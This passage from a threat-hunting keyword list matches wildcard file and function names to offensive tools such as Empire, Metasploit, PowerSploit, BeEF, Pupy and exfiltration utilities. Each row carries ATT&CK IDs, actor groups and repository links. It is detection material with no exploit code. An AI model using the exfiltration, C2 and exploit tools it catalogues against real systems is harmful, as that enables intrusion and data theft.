- T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-ExfilDataToGitHub.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ExfilDataToGitHub*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1140,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exfil-EC266392-D6BC-4F7B-A4D1-410166D30B55.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*exfiltrate_via_post.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*Exfiltration from DNS finished!*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*Exfiltration from HTTPS finished!*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*Exfiltration.tests.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*existing_auto_target.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exit_nimbo*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*--expected Bad --expected-stop Welcome*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,0,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*expl-bin*,offensive_tool_keyword,expl-bin,some of my modified exploits and some scripts.,T1210.001 - T1201 - T1059,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/sailay1996/expl-bin,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*explib2_ie11_exec_test_case.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exploit*wordpress_add_admin*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*exploit.bash*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.bat*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.bin*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.c*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.com*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.exe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,1,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.msi*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.pl*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.ps1*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,1,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.py*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,1,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.reg*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.run*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.sh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.vb*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.vbe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.vbs*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,1,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.vbscript*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.zsh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*Exploit:Python/CVE*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*exploit_frameworks.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*exploit_fuse.c*,offensive_tool_keyword,POC,This repo contains demo exploits for CVE-2022-0185,T1210 - T1222 - T1506 - T1068,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Crusaders-of-Rust/CVE-2022-0185,1,0,N/A,N/A,4,364,55,2022-04-25T04:11:33Z,2022-01-19T06:19:38Z -*exploit_kctf.c*,offensive_tool_keyword,POC,This repo contains demo exploits for CVE-2022-0185,T1210 - T1222 - T1506 - T1068,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Crusaders-of-Rust/CVE-2022-0185,1,0,N/A,N/A,4,364,55,2022-04-25T04:11:33Z,2022-01-19T06:19:38Z -*exploit_oneline.md*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/drgreenthumb93/CVE-2022-30190-follina,1,1,N/A,N/A,1,10,4,2023-04-20T20:34:05Z,2022-06-01T11:37:08Z -*exploit_suggester *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*exploit_suggester.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*exploit_suggester.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Exploitation Toolkit*,offensive_tool_keyword,PRT,PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. PRET offers a whole bunch of commands useful for printer attacks and fuzzing,T1210.001 - T1027.002 - T1003 - T1505 - T1564.001,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/RUB-NDS/PRT,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*exploit-database-bin-sploits/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*Exploit-JBoss -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exploit-JBoss.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exploit-JBoss.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exploit-Jenkins*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-Jenkins.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exploit-Jenkins.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exploit-JMXConsole*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*exploits*_csrf/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*exploits*_csrf/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*exploits/*_macro*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exploits/CVE-*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exploit-suggester*,offensive_tool_keyword,Windows-Exploit-Suggester,This tool compares a targets patch levels against the 